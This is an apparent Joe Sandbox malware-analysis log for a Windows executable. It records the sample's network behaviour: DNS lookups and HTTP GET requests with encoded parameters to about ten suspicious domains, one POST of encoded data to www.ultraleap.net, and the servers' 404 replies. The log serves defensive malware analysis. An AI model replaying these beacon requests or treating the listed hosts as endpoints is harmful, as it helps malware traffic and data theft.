            Source: Joe Sandbox ViewIP Address: 217.70.184.50 217.70.184.50
            Source: Joe Sandbox ViewASN Name: VIMRO-AS15189US VIMRO-AS15189US
            Source: Joe Sandbox ViewASN Name: SINGLEHOP-LLCUS SINGLEHOP-LLCUS
            Source: Joe Sandbox ViewASN Name: DNC-ASDimensionNetworkCommunicationLimitedHK DNC-ASDimensionNetworkCommunicationLimitedHK
            Source: Joe Sandbox ViewASN Name: GANDI-ASDomainnameregistrar-httpwwwgandinetFR GANDI-ASDomainnameregistrar-httpwwwgandinetFR
            Source: Joe Sandbox ViewASN Name: REGISTER-ASIT REGISTER-ASIT
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_007E2404 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_007E2404
            Source: global trafficHTTP traffic detected: GET /a4ar/?n0=mTk8u4lhzbnhVh&PR_xXrA=bigEPZ6XMKFUrjbnFuEouLJTNPVDiP/j9U81Matj+rZ/AUf1cwoUFkvfutX9dfv4h0MjihypUwM2GA6oEMuOAdNfbVj3/yE4LVCgAj4ckDbKMFX8mxMH3uQ= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.2bhp.comConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /8pln/?PR_xXrA=T9/DtY4QstE2hf5O1waUB+I/eJ4Uv9cvfz5cQjr/yHb6PkgoDrQz8TZtAEENUqwsBaW/Syqgj8DnNvIHzYG9oL792aB/FoBSyK+aeSTPR1nXcfMqNX8wInY=&n0=mTk8u4lhzbnhVh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.ultraleap.netConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /v2c3/?n0=mTk8u4lhzbnhVh&PR_xXrA=4KW7rJi8xQgG5Juif0zvrQruwxJNCZQzPrutLC9Z2JC7riozJk19TyUHcpxc9ASY/m5rLPYp2hVK9kL/MGxev+uUFboPihN5w7Wu/KeDCgTl/GYzmTNxclA= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.dalong.siteConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /xamn/?PR_xXrA=eI40u+kXl6dCNOxuFKbCigR1N86mEgfKXPnA2oRVh57cb1FOyw5acKt1uSVkrtOGePUCnlUQIJS7kZjahSWR6R1adFopucWDE2ha6/s1PPXDYip6cFIdDHY=&n0=mTk8u4lhzbnhVh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.mgeducacaopro.onlineConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /fava/?PR_xXrA=GCDZpLqdSYk7fT5CRgwCB4qcStchn8AdfdSMH3wAhEJHSlsoeLITVJbnCwS/lbUV+KMqaRxHJZIr2IJ0lKwQCgtKpqiTYCqf8kUZvClY0WdZB6RiKYyZbbU=&n0=mTk8u4lhzbnhVh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.heldhold.xyzConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /5o7d/?PR_xXrA=zMeRclQqEZ6cHEksxL2258xeQPEFk6LXLXq5VQFXrGMOKBUumeR2nXgC5pr3HgG3QDdipY9Tb1BbXYBiFpGduAov/pmUDz/4soHslE7c+cNQZpL9+8t0WKA=&n0=mTk8u4lhzbnhVh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.63582.photoConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /kt2f/?PR_xXrA=3qIRfQl/AKdo1myUuOHVh1YjbZAZzTLYZ4NmxJouZDst8nFYGFmfJjzqUfk6VEmL81v5o0lFZhte5+gDx+sfFJzn9v28G/J2fr9BwA1qwWv9b12erCAk53Y=&n0=mTk8u4lhzbnhVh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.asiapartnars.onlineConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /al6z/?n0=mTk8u4lhzbnhVh&PR_xXrA=VRCNh0NW0GgzXjJ9PdlWfXWwdPKpBv6LK6gi/31OI/HLVz3edLOFPgfBWIIFI1yv4KnHdZ/ByCAdRrOw29Cps8gpdM+xYTm/p50f5dz2MVQM3pqegGrg4cw= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.linkwave.cloudConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /3lu7/?PR_xXrA=nzWofdhWpyQTuQkDfxpOhZSR2SP28ZN4SJ26h7kwykQFM8AQx5IfrLSrYivs6QFJHI8FrKvcoPkOi5L1XFRCLbCiXi5UAF8H0knLfKrCbz8tBFYRfGccZ0A=&n0=mTk8u4lhzbnhVh HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.mfgarage.netConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /zznj/?n0=mTk8u4lhzbnhVh&PR_xXrA=XN/afWzprYUm2zEh/Me8v7IO6BZfJ8ldqsTKqfvYzDGyGH3Qqe2ibLEK4zu3d4hkDWgHsBH7o/PgLSUsZsuwL2SV1lDf+BUf6ZfDIcx/0TWTXhhDzyKZrRs= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.b5x7vk.agencyConnection: closeUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
            Source: global trafficDNS traffic detected: DNS query: www.2bhp.com
            Source: global trafficDNS traffic detected: DNS query: www.ultraleap.net
            Source: global trafficDNS traffic detected: DNS query: www.dalong.site
            Source: global trafficDNS traffic detected: DNS query: www.mgeducacaopro.online
            Source: global trafficDNS traffic detected: DNS query: www.heldhold.xyz
            Source: global trafficDNS traffic detected: DNS query: www.63582.photo
            Source: global trafficDNS traffic detected: DNS query: www.useanecdotenow.tech
            Source: global trafficDNS traffic detected: DNS query: www.asiapartnars.online
            Source: global trafficDNS traffic detected: DNS query: www.linkwave.cloud
            Source: global trafficDNS traffic detected: DNS query: www.mfgarage.net
            Source: global trafficDNS traffic detected: DNS query: www.b5x7vk.agency
            Source: unknownHTTP traffic detected: POST /8pln/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflateHost: www.ultraleap.netOrigin: http://www.ultraleap.netContent-Length: 204Content-Type: application/x-www-form-urlencodedCache-Control: no-cacheConnection: closeReferer: http://www.ultraleap.net/8pln/User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36Data Raw: 50 52 5f 78 58 72 41 3d 65 2f 58 6a 75 76 46 59 68 35 34 77 34 36 70 41 31 52 66 4e 51 72 73 6b 61 4b 4d 33 35 76 51 7a 47 57 52 74 63 31 66 38 33 30 62 31 4a 32 38 54 46 74 63 79 2b 44 4e 50 4c 41 73 55 63 6f 4e 74 50 70 6e 76 58 68 6d 33 72 38 48 6b 4b 75 77 70 76 39 69 48 6f 37 6a 45 77 70 42 4e 61 49 78 51 76 36 4f 4b 59 53 36 7a 5a 32 50 51 61 72 4d 72 4d 43 34 36 48 6b 76 6b 49 63 47 36 46 6e 6e 43 68 55 32 55 4c 69 43 57 57 52 4a 79 36 78 45 50 35 46 42 39 4b 76 44 46 72 55 6d 70 2b 51 72 33 6a 76 6d 39 63 42 63 65 56 73 4c 48 56 55 55 63 2b 39 67 31 66 62 72 70 56 46 65 49 5a 7a 77 55 46 41 3d 3d Data Ascii: PR_xXrA=e/XjuvFYh54w46pA1RfNQrskaKM35vQzGWRtc1f830b1J28TFtcy+DNPLAsUcoNtPpnvXhm3r8HkKuwpv9iHo7jEwpBNaIxQv6OKYS6zZ2PQarMrMC46HkvkIcG6FnnChU2ULiCWWRJy6xEP5FB9KvDFrUmp+Qr3jvm9cBceVsLHVUUc+9g1fbrpVFeIZzwUFA==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 10:46:29 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 61 34 61 72 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /a4ar/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Wed, 25 Sep 2024 10:47:00 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Wed, 25 Sep 2024 10:47:03 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Wed, 25 Sep 2024 10:47:05 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Wed, 25 Sep 2024 10:47:08 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
